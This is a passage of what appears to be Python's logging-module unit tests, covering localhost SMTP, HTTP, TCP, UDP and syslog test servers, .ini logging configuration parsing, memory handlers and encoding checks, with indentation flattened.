logging.raiseExceptions = old_raise
def test_stream_setting(self):
"""
Test setting the handler's stream
"""
h = logging.StreamHandler()
stream = io.StringIO()
old = h.setStream(stream)
self.assertIs(old, sys.stderr)
actual = h.setStream(old)
self.assertIs(actual, stream)
# test that setting to existing value returns None
actual = h.setStream(old)
self.assertIsNone(actual)
def test_can_represent_stream_with_int_name(self):
h = logging.StreamHandler(StreamWithIntName())
self.assertEqual(repr(h), '<StreamHandler 2 (NOTSET)>')
# -- The following section could be moved into a server_helper.py module
# -- if it proves to be of wider utility than just test_logging
class TestSMTPServer(smtpd.SMTPServer):
"""
This class implements a test SMTP server.
:param addr: A (host, port) tuple which the server listens on.
You can specify a port value of zero: the server's
*port* attribute will hold the actual port number
used, which can be used in client connections.
:param handler: A callable which will be called to process
incoming messages. The handler will be passed
the client address tuple, who the message is from,
a list of recipients and the message data.
:param poll_interval: The interval, in seconds, used in the underlying
:func:`select` or :func:`poll` call by
:func:`asyncore.loop`.
:param sockmap: A dictionary which will be used to hold
:class:`asyncore.dispatcher` instances used by
:func:`asyncore.loop`. This avoids changing the
:mod:`asyncore` module's global state.
"""
def __init__(self, addr, handler, poll_interval, sockmap):
smtpd.SMTPServer.__init__(self, addr, None, map=sockmap,
decode_data=True)
self.port = self.socket.getsockname()[1]
self._handler = handler
self._thread = None
self.poll_interval = poll_interval
def process_message(self, peer, mailfrom, rcpttos, data):
"""
Delegates to the handler passed in to the server's constructor.
Typically, this will be a test case method.
:param peer: The client (host, port) tuple.
:param mailfrom: The address of the sender.
:param rcpttos: The addresses of the recipients.
:param data: The message.
"""
self._handler(peer, mailfrom, rcpttos, data)
def start(self):
"""
Start the server running on a separate daemon thread.
"""
self._thread = t = threading.Thread(target=self.serve_forever,
args=(self.poll_interval,))
t.setDaemon(True)
t.start()
def serve_forever(self, poll_interval):
"""
Run the :mod:`asyncore` loop until normal termination
conditions arise.
:param poll_interval: The interval, in seconds, used in the underlying
:func:`select` or :func:`poll` call by
:func:`asyncore.loop`.
"""
asyncore.loop(poll_interval, map=self._map)
def stop(self, timeout=None):
"""
Stop the thread by closing the server instance.
Wait for the server thread to terminate.
:param timeout: How long to wait for the server thread
to terminate.
"""
self.close()
support.join_thread(self._thread, timeout)
self._thread = None
asyncore.close_all(map=self._map, ignore_all=True)
class ControlMixin(object):
"""
This mixin is used to start a server on a separate thread, and
shut it down programmatically. Request handling is simplified - instead
of needing to derive a suitable RequestHandler subclass, you just
provide a callable which will be passed each received request to be
processed.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request. This handler is called on the
server thread, effectively meaning that requests are
processed serially. While not quite Web scale ;-),
this should be fine for testing applications.
:param poll_interval: The polling interval in seconds.
"""
def __init__(self, handler, poll_interval):
self._thread = None
self.poll_interval = poll_interval
self._handler = handler
self.ready = threading.Event()
def start(self):
"""
Create a daemon thread to run the server, and start it.
"""
self._thread = t = threading.Thread(target=self.serve_forever,
args=(self.poll_interval,))
t.setDaemon(True)
t.start()
def serve_forever(self, poll_interval):
"""
Run the server. Set the ready flag before entering the
service loop.
"""
self.ready.set()
super(ControlMixin, self).serve_forever(poll_interval)
def stop(self, timeout=None):
"""
Tell the server thread to stop, and wait for it to do so.
:param timeout: How long to wait for the server thread
to terminate.
"""
self.shutdown()
if self._thread is not None:
support.join_thread(self._thread, timeout)
self._thread = None
self.server_close()
self.ready.clear()
class TestHTTPServer(ControlMixin, HTTPServer):
"""
An HTTP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request.
:param poll_interval: The polling interval in seconds.
:param log: Pass ``True`` to enable log messages.
"""
def __init__(self, addr, handler, poll_interval=0.5,
log=False, sslctx=None):
class DelegatingHTTPRequestHandler(BaseHTTPRequestHandler):
def __getattr__(self, name, default=None):
if name.startswith('do_'):
return self.process_request
raise AttributeError(name)
def process_request(self):
self.server._handler(self)
def log_message(self, format, *args):
if log:
super(DelegatingHTTPRequestHandler,
self).log_message(format, *args)
HTTPServer.__init__(self, addr, DelegatingHTTPRequestHandler)
ControlMixin.__init__(self, handler, poll_interval)
self.sslctx = sslctx
def get_request(self):
try:
sock, addr = self.socket.accept()
if self.sslctx:
sock = self.sslctx.wrap_socket(sock, server_side=True)
except OSError as e:
# socket errors are silenced by the caller, print them here
sys.stderr.write("Got an error:\n%s\n" % e)
raise
return sock, addr
class TestTCPServer(ControlMixin, ThreadingTCPServer):
"""
A TCP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a single
parameter - the request - in order to process the request.
:param poll_interval: The polling interval in seconds.
:bind_and_activate: If True (the default), binds the server and starts it
listening. If False, you need to call
:meth:`server_bind` and :meth:`server_activate` at
some later time before calling :meth:`start`, so that
the server will set up the socket and listen on it.
"""
allow_reuse_address = True
def __init__(self, addr, handler, poll_interval=0.5,
bind_and_activate=True):
class DelegatingTCPRequestHandler(StreamRequestHandler):
def handle(self):
self.server._handler(self)
ThreadingTCPServer.__init__(self, addr, DelegatingTCPRequestHandler,
bind_and_activate)
ControlMixin.__init__(self, handler, poll_interval)
def server_bind(self):
super(TestTCPServer, self).server_bind()
self.port = self.socket.getsockname()[1]
class TestUDPServer(ControlMixin, ThreadingUDPServer):
"""
A UDP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request.
:param poll_interval: The polling interval for shutdown requests,
in seconds.
:bind_and_activate: If True (the default), binds the server and
starts it listening. If False, you need to
call :meth:`server_bind` and
:meth:`server_activate` at some later time
before calling :meth:`start`, so that the server will
set up the socket and listen on it.
"""
def __init__(self, addr, handler, poll_interval=0.5,
bind_and_activate=True):
class DelegatingUDPRequestHandler(DatagramRequestHandler):
def handle(self):
self.server._handler(self)
def finish(self):
data = self.wfile.getvalue()
if data:
try:
super(DelegatingUDPRequestHandler, self).finish()
except OSError:
if not self.server._closed:
raise
ThreadingUDPServer.__init__(self, addr,
DelegatingUDPRequestHandler,
bind_and_activate)
ControlMixin.__init__(self, handler, poll_interval)
self._closed = False
def server_bind(self):
super(TestUDPServer, self).server_bind()
self.port = self.socket.getsockname()[1]
def server_close(self):
super(TestUDPServer, self).server_close()
self._closed = True
if hasattr(socket, "AF_UNIX"):
class TestUnixStreamServer(TestTCPServer):
address_family = socket.AF_UNIX
class TestUnixDatagramServer(TestUDPServer):
address_family = socket.AF_UNIX
# - end of server_helper section
class SMTPHandlerTest(BaseTest):
# bpo-14314, bpo-19665, bpo-34092: don't wait forever, timeout of 1 minute
TIMEOUT = 60.0
def test_basic(self):
sockmap = {}
server = TestSMTPServer((support.HOST, 0), self.process_message, 0.001,
sockmap)
server.start()
addr = (support.HOST, server.port)
h = logging.handlers.SMTPHandler(addr, 'me', 'you', 'Log',
timeout=self.TIMEOUT)
self.assertEqual(h.toaddrs, ['you'])
self.messages = []
r = logging.makeLogRecord({'msg': 'Hello \u2713'})
self.handled = threading.Event()
h.handle(r)
self.handled.wait(self.TIMEOUT)
server.stop()
self.assertTrue(self.handled.is_set())
self.assertEqual(len(self.messages), 1)
peer, mailfrom, rcpttos, data = self.messages[0]
self.assertEqual(mailfrom, 'me')
self.assertEqual(rcpttos, ['you'])
self.assertIn('\nSubject: Log\n', data)
self.assertTrue(data.endswith('\n\nHello \u2713'))
h.close()
def process_message(self, *args):
self.messages.append(args)
self.handled.set()
class MemoryHandlerTest(BaseTest):
"""Tests for the MemoryHandler."""
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
self.root_hdlr)
self.mem_logger = logging.getLogger('mem')
self.mem_logger.propagate = 0
self.mem_logger.addHandler(self.mem_hdlr)
def tearDown(self):
self.mem_hdlr.close()
BaseTest.tearDown(self)
def test_flush(self):
# The memory handler flushes to its target handler based on specific
# criteria (message count and message level).
self.mem_logger.debug(self.next_message())
self.assert_log_lines([])
self.mem_logger.info(self.next_message())
self.assert_log_lines([])
# This will flush because the level is >= logging.WARNING
self.mem_logger.warning(self.next_message())
lines = [
('DEBUG', '1'),
('INFO', '2'),
('WARNING', '3'),
]
self.assert_log_lines(lines)
for n in (4, 14):
for i in range(9):
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
# This will flush because it's the 10th message since the last
# flush.
self.mem_logger.debug(self.next_message())
lines = lines + [('DEBUG', str(i)) for i in range(n, n + 10)]
self.assert_log_lines(lines)
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
def test_flush_on_close(self):
"""
Test that the flush-on-close configuration works as expected.
"""
self.mem_logger.debug(self.next_message())
self.assert_log_lines([])
self.mem_logger.info(self.next_message())
self.assert_log_lines([])
self.mem_logger.removeHandler(self.mem_hdlr)
# Default behaviour is to flush on close. Check that it happens.
self.mem_hdlr.close()
lines = [
('DEBUG', '1'),
('INFO', '2'),
]
self.assert_log_lines(lines)
# Now configure for flushing not to be done on close.
self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
self.root_hdlr,
False)
self.mem_logger.addHandler(self.mem_hdlr)
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines) # no change
self.mem_logger.info(self.next_message())
self.assert_log_lines(lines) # no change
self.mem_logger.removeHandler(self.mem_hdlr)
self.mem_hdlr.close()
# assert that no new lines have been added
self.assert_log_lines(lines) # no change
class ExceptionFormatter(logging.Formatter):
"""A special exception formatter."""
def formatException(self, ei):
return "Got a [%s]" % ei[0].__name__
class ConfigFileTest(BaseTest):
"""Reading logging config from a .ini-style config file."""
check_no_resource_warning = support.check_no_resource_warning
expected_log_pat = r"^(\w+) \+\+ (\w+)$"
# config0 is a standard configuration.
config0 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1 adds a little to the standard configuration.
config1 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1a moves the handler to the root.
config1a = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config2 has a subtle configuration error that should be reported
config2 = config1.replace("sys.stdout", "sys.stbout")
# config3 has a less subtle configuration error
config3 = config1.replace("formatter=form1", "formatter=misspelled_name")
# config4 specifies a custom formatter class to be loaded
config4 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=NOTSET
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
class=""" + __name__ + """.ExceptionFormatter
format=%(levelname)s:%(name)s:%(message)s
datefmt=
"""
# config5 specifies a custom handler class to be loaded
config5 = config1.replace('class=StreamHandler', 'class=logging.StreamHandler')
# config6 uses ', ' delimiters in the handlers and formatters sections
config6 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1, hand2
[formatters]
keys=form1, form2
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[handler_hand2]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stderr,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
[formatter_form2]
format=%(message)s
datefmt=
"""
# config7 adds a compiler logger, and uses kwargs instead of args.
config7 = """
[loggers]
keys=root,parser,compiler
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_compiler]
level=DEBUG
handlers=
propagate=1
qualname=compiler
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
kwargs={'stream': sys.stdout,}
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config 8, check for resource warning
config8 = r"""
[loggers]
keys=root
[handlers]
keys=file
[formatters]
keys=
[logger_root]
level=DEBUG
handlers=file
[handler_file]
class=FileHandler
level=DEBUG
args=("{tempfile}",)
"""
disable_test = """
[loggers]
keys=root
[handlers]
keys=screen
[formatters]
keys=
[logger_root]
level=DEBUG
handlers=screen
[handler_screen]
level=DEBUG
class=StreamHandler
args=(sys.stdout,)
formatter=
"""
def apply_config(self, conf, **kwargs):
file = io.StringIO(textwrap.dedent(conf))
logging.config.fileConfig(file, **kwargs)
def test_config0_ok(self):
# A simple config file which overrides the default settings.
with support.captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config0_using_cp_ok(self):
# A simple config file which overrides the default settings.
with support.captured_stdout() as output:
file = io.StringIO(textwrap.dedent(self.config0))
cp = configparser.ConfigParser()
cp.read_file(file)
logging.config.fileConfig(cp)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config file defining a sub-parser as well.
with support.captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2)
def test_config3_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config3)
def test_config4_ok(self):
# A config file specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4)
logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_ok(self):
self.test_config1_ok(config=self.config6)
def test_config7_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1a)
logger = logging.getLogger("compiler.parser")
# See issue #11424. compiler-hyphenated sorts
# between compiler and compiler.xyz and this
# was preventing compiler.xyz from being included
# in the child loggers of compiler because of an
# overzealous loop termination condition.
hyphenated = logging.getLogger('compiler-hyphenated')
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
# Will not appear
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config8_ok(self):
def cleanup(h1, fn):
h1.close()
os.remove(fn)
with self.check_no_resource_warning():
fd, fn = tempfile.mkstemp(".log", "test_logging-X-")
os.close(fd)
# Replace single backslash with double backslash in windows
# to avoid unicode error during string formatting
if os.name == "nt":
fn = fn.replace("\\", "\\\\")
config8 = self.config8.format(tempfile=fn)
self.apply_config(config8)
self.apply_config(config8)
handler = logging.root.handlers[0]
self.addCleanup(cleanup, handler, fn)
def test_logger_disabling(self):
self.apply_config(self.disable_test)
logger = logging.getLogger('some_pristine_logger')
self.assertFalse(logger.disabled)
self.apply_config(self.disable_test)
self.assertTrue(logger.disabled)
self.apply_config(self.disable_test, disable_existing_loggers=False)
self.assertFalse(logger.disabled)
def test_config_set_handler_names(self):
test_config = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
handlers=hand1
[handler_hand1]
class=StreamHandler
formatter=form1
[formatter_form1]
format=%(levelname)s ++ %(message)s
"""
self.apply_config(test_config)
self.assertEquals(logging.getLogger().handlers[0].name, 'hand1')
def test_defaults_do_no_interpolation(self):
"""bpo-33802 defaults should not get interpolated"""
ini = textwrap.dedent("""
[formatters]
keys=default
[formatter_default]
[handlers]
keys=console
[handler_console]
class=logging.StreamHandler
args=tuple()
[loggers]
keys=root
[logger_root]
formatter=default
handlers=console
""").strip()
fd, fn = tempfile.mkstemp(prefix='test_logging_', suffix='.ini')
try:
os.write(fd, ini.encode('ascii'))
os.close(fd)
logging.config.fileConfig(
fn,
defaults=dict(
version=1,
disable_existing_loggers=False,
formatters={
"generic": {
"format": "%(asctime)s [%(process)d] [%(levelname)s] %(message)s",
"datefmt": "[%Y-%m-%d %H:%M:%S %z]",
"class": "logging.Formatter"
},
},
)
)
finally:
os.unlink(fn)
class SocketHandlerTest(BaseTest):
"""Test for SocketHandler objects."""
server_class = TestTCPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a TCP server to receive log messages, and a SocketHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
# Issue #29177: deal with errors that happen during setup
self.server = self.sock_hdlr = self.server_exception = None
try:
self.server = server = self.server_class(self.address,
self.handle_socket, 0.01)
server.start()
# Uncomment next line to test error recovery in setUp()
# raise OSError('dummy error raised')
except OSError as e:
self.server_exception = e
return
server.ready.wait()
hcls = logging.handlers.SocketHandler
if isinstance(server.server_address, tuple):
self.sock_hdlr = hcls('localhost', server.port)
else:
self.sock_hdlr = hcls(server.server_address, None)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
self.handled = threading.Semaphore(0)
def tearDown(self):
"""Shutdown the TCP server."""
try:
if self.sock_hdlr:
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
if self.server:
self.server.stop(2.0)
finally:
BaseTest.tearDown(self)
def handle_socket(self, request):
conn = request.connection
while True:
chunk = conn.recv(4)
if len(chunk) < 4:
break
slen = struct.unpack(">L", chunk)[0]
chunk = conn.recv(slen)
while len(chunk) < slen:
chunk = chunk + conn.recv(slen - len(chunk))
obj = pickle.loads(chunk)
record = logging.makeLogRecord(obj)
self.log_output += record.msg + '\n'
self.handled.release()
def test_output(self):
# The log message sent to the SocketHandler is properly received.
if self.server_exception:
self.skipTest(self.server_exception)
logger = logging.getLogger("tcp")
logger.error("spam")
self.handled.acquire()
logger.debug("eggs")
self.handled.acquire()
self.assertEqual(self.log_output, "spam\neggs\n")
def test_noserver(self):
if self.server_exception:
self.skipTest(self.server_exception)
# Avoid timing-related failures due to SocketHandler's own hard-wired
# one-second timeout on socket.create_connection() (issue #16264).
self.sock_hdlr.retryStart = 2.5
# Kill the server
self.server.stop(2.0)
# The logging call should try to connect, which should fail
try:
raise RuntimeError('Deliberate mistake')
except RuntimeError:
self.root_logger.exception('Never sent')
self.root_logger.error('Never sent, either')
now = time.time()
self.assertGreater(self.sock_hdlr.retryTime, now)
time.sleep(self.sock_hdlr.retryTime - now + 0.001)
self.root_logger.error('Nor this')
def _get_temp_domain_socket():
fd, fn = tempfile.mkstemp(prefix='test_logging_', suffix='.sock')
os.close(fd)
# just need a name - file can't be present, or we'll get an
# 'address already in use' error.
os.remove(fn)
return fn
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
class UnixSocketHandlerTest(SocketHandlerTest):
"""Test for SocketHandler with unix sockets."""
if hasattr(socket, "AF_UNIX"):
server_class = TestUnixStreamServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
SocketHandlerTest.setUp(self)
def tearDown(self):
SocketHandlerTest.tearDown(self)
support.unlink(self.address)
class DatagramHandlerTest(BaseTest):
"""Test for DatagramHandler."""
server_class = TestUDPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a UDP server to receive log messages, and a DatagramHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
# Issue #29177: deal with errors that happen during setup
self.server = self.sock_hdlr = self.server_exception = None
try:
self.server = server = self.server_class(self.address,
self.handle_datagram, 0.01)
server.start()
# Uncomment next line to test error recovery in setUp()
# raise OSError('dummy error raised')
except OSError as e:
self.server_exception = e
return
server.ready.wait()
hcls = logging.handlers.DatagramHandler
if isinstance(server.server_address, tuple):
self.sock_hdlr = hcls('localhost', server.port)
else:
self.sock_hdlr = hcls(server.server_address, None)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
self.handled = threading.Event()
def tearDown(self):
"""Shutdown the UDP server."""
try:
if self.server:
self.server.stop(2.0)
if self.sock_hdlr:
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
finally:
BaseTest.tearDown(self)
def handle_datagram(self, request):
slen = struct.pack('>L', 0) # length of prefix
packet = request.packet[len(slen):]
obj = pickle.loads(packet)
record = logging.makeLogRecord(obj)
self.log_output += record.msg + '\n'
self.handled.set()
def test_output(self):
# The log message sent to the DatagramHandler is properly received.
if self.server_exception:
self.skipTest(self.server_exception)
logger = logging.getLogger("udp")
logger.error("spam")
self.handled.wait()
self.handled.clear()
logger.error("eggs")
self.handled.wait()
self.assertEqual(self.log_output, "spam\neggs\n")
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
class UnixDatagramHandlerTest(DatagramHandlerTest):
"""Test for DatagramHandler using Unix sockets."""
if hasattr(socket, "AF_UNIX"):
server_class = TestUnixDatagramServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
DatagramHandlerTest.setUp(self)
def tearDown(self):
DatagramHandlerTest.tearDown(self)
support.unlink(self.address)
class SysLogHandlerTest(BaseTest):
"""Test for SysLogHandler using UDP."""
server_class = TestUDPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a UDP server to receive log messages, and a SysLogHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
# Issue #29177: deal with errors that happen during setup
self.server = self.sl_hdlr = self.server_exception = None
try:
self.server = server = self.server_class(self.address,
self.handle_datagram, 0.01)
server.start()
# Uncomment next line to test error recovery in setUp()
# raise OSError('dummy error raised')
except OSError as e:
self.server_exception = e
return
server.ready.wait()
hcls = logging.handlers.SysLogHandler
if isinstance(server.server_address, tuple):
self.sl_hdlr = hcls((server.server_address[0], server.port))
else:
self.sl_hdlr = hcls(server.server_address)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sl_hdlr)
self.handled = threading.Event()
def tearDown(self):
"""Shutdown the server."""
try:
if self.server:
self.server.stop(2.0)
if self.sl_hdlr:
self.root_logger.removeHandler(self.sl_hdlr)
self.sl_hdlr.close()
finally:
BaseTest.tearDown(self)
def handle_datagram(self, request):
self.log_output = request.packet
self.handled.set()
def test_output(self):
if self.server_exception:
self.skipTest(self.server_exception)
# The log message sent to the SysLogHandler is properly received.
logger = logging.getLogger("slh")
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m\x00')
self.handled.clear()
self.sl_hdlr.append_nul = False
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m')
self.handled.clear()
self.sl_hdlr.ident = "h\xe4m-"
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>h\xc3\xa4m-sp\xc3\xa4m')
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
class UnixSysLogHandlerTest(SysLogHandlerTest):
"""Test for SysLogHandler with Unix sockets."""
if hasattr(socket, "AF_UNIX"):
server_class = TestUnixDatagramServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
SysLogHandlerTest.setUp(self)
def tearDown(self):
SysLogHandlerTest.tearDown(self)
support.unlink(self.address)
@unittest.skipUnless(support.IPV6_ENABLED,
'IPv6 support required for this test.')
class IPv6SysLogHandlerTest(SysLogHandlerTest):
"""Test for SysLogHandler with IPv6 host."""
server_class = TestUDPServer
address = ('::1', 0)
def setUp(self):
self.server_class.address_family = socket.AF_INET6
super(IPv6SysLogHandlerTest, self).setUp()
def tearDown(self):
self.server_class.address_family = socket.AF_INET
super(IPv6SysLogHandlerTest, self).tearDown()
class HTTPHandlerTest(BaseTest):
"""Test for HTTPHandler."""
def setUp(self):
"""Set up an HTTP server to receive log messages, and a HTTPHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
self.handled = threading.Event()
def handle_request(self, request):
self.command = request.command
self.log_data = urlparse(request.path)
if self.command == 'POST':
try:
rlen = int(request.headers['Content-Length'])
self.post_data = request.rfile.read(rlen)
except:
self.post_data = None
request.send_response(200)
request.end_headers()
self.handled.set()
def test_output(self):
# The log message sent to the HTTPHandler is properly received.
logger = logging.getLogger("http")
root_logger = self.root_logger
root_logger.removeHandler(self.root_logger.handlers[0])
for secure in (False, True):
addr = ('localhost', 0)
if secure:
try:
import ssl
except ImportError:
sslctx = None
else:
here = os.path.dirname(__file__)
localhost_cert = os.path.join(here, "keycert.pem")
sslctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
sslctx.load_cert_chain(localhost_cert)
context = ssl.create_default_context(cafile=localhost_cert)
else:
sslctx = None
context = None
self.server = server = TestHTTPServer(addr, self.handle_request,
0.01, sslctx=sslctx)
server.start()
server.ready.wait()
host = 'localhost:%d' % server.server_port
secure_client = secure and sslctx
self.h_hdlr = logging.handlers.HTTPHandler(host, '/frob',
secure=secure_client,
context=context,
credentials=('foo', 'bar'))
self.log_data = None
root_logger.addHandler(self.h_hdlr)
for method in ('GET', 'POST'):
self.h_hdlr.method = method
self.handled.clear()
msg = "sp\xe4m"
logger.error(msg)
self.handled.wait()
self.assertEqual(self.log_data.path, '/frob')
self.assertEqual(self.command, method)
if method == 'GET':
d = parse_qs(self.log_data.query)
else:
d = parse_qs(self.post_data.decode('utf-8'))
self.assertEqual(d['name'], ['http'])
self.assertEqual(d['funcName'], ['test_output'])
self.assertEqual(d['msg'], [msg])
self.server.stop(2.0)
self.root_logger.removeHandler(self.h_hdlr)
self.h_hdlr.close()
class MemoryTest(BaseTest):
"""Test memory persistence of logger objects."""
def setUp(self):
"""Create a dict to remember potentially destroyed objects."""
BaseTest.setUp(self)
self._survivors = {}
def _watch_for_survival(self, *args):
"""Watch the given objects for survival, by creating weakrefs to
them."""
for obj in args:
key = id(obj), repr(obj)
self._survivors[key] = weakref.ref(obj)
def _assertTruesurvival(self):
"""Assert that all objects watched for survival have survived."""
# Trigger cycle breaking.
gc.collect()
dead = []
for (id_, repr_), ref in self._survivors.items():
if ref() is None:
dead.append(repr_)
if dead:
self.fail("%d objects should have survived "
"but have been destroyed: %s" % (len(dead), ", ".join(dead)))
def test_persistent_loggers(self):
# Logger objects are persistent and retain their configuration, even
# if visible references are destroyed.
self.root_logger.setLevel(logging.INFO)
foo = logging.getLogger("foo")
self._watch_for_survival(foo)
foo.setLevel(logging.DEBUG)
self.root_logger.debug(self.next_message())
foo.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
])
del foo
# foo has survived.
self._assertTruesurvival()
# foo has retained its settings.
bar = logging.getLogger("foo")
bar.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
('foo', 'DEBUG', '3'),
])
class EncodingTest(BaseTest):
def test_encoding_plain_file(self):
# In Python 2.x, a plain file object is treated as having no encoding.
log = logging.getLogger("test")
fd, fn = tempfile.mkstemp(".log", "test_logging-1-")
os.close(fd)
# the non-ascii data we write to the log.
data = "foo\x80"
try:
handler = logging.FileHandler(fn, encoding="utf-8")
log.addHandler(handler)
try:
# write non-ascii data to the log.
log.warning(data)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
f = open(fn, encoding="utf-8")
try:
self.assertEqual(f.read().rstrip(), data)
finally:
f.close()
finally:
if os.path.isfile(fn):
os.remove(fn)
def test_encoding_cyrillic_unicode(self):
log = logging.getLogger("test")
# Get a message in Unicode: Do svidanya in Cyrillic (meaning goodbye)
message = '\u0434\u043e \u0441\u0432\u0438\u0434\u0430\u043d\u0438\u044f'
# Ensure it's written in a Cyrillic encoding
writer_class = codecs.getwriter('cp1251')
writer_class.encoding = 'cp1251'
stream = io.BytesIO()
writer = writer_class(stream, 'strict')
handler = logging.StreamHandler(writer)
log.addHandler(handler)
try:
log.warning(message)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
s = stream.getvalue()
# Compare against what the data should be when encoded in CP-1251
self.assertEqual(s, b'\xe4\xee \xf1\xe2\xe8\xe4\xe0\xed\xe8\xff\n')
class WarningsTest(BaseTest):
def test_warnings(self):
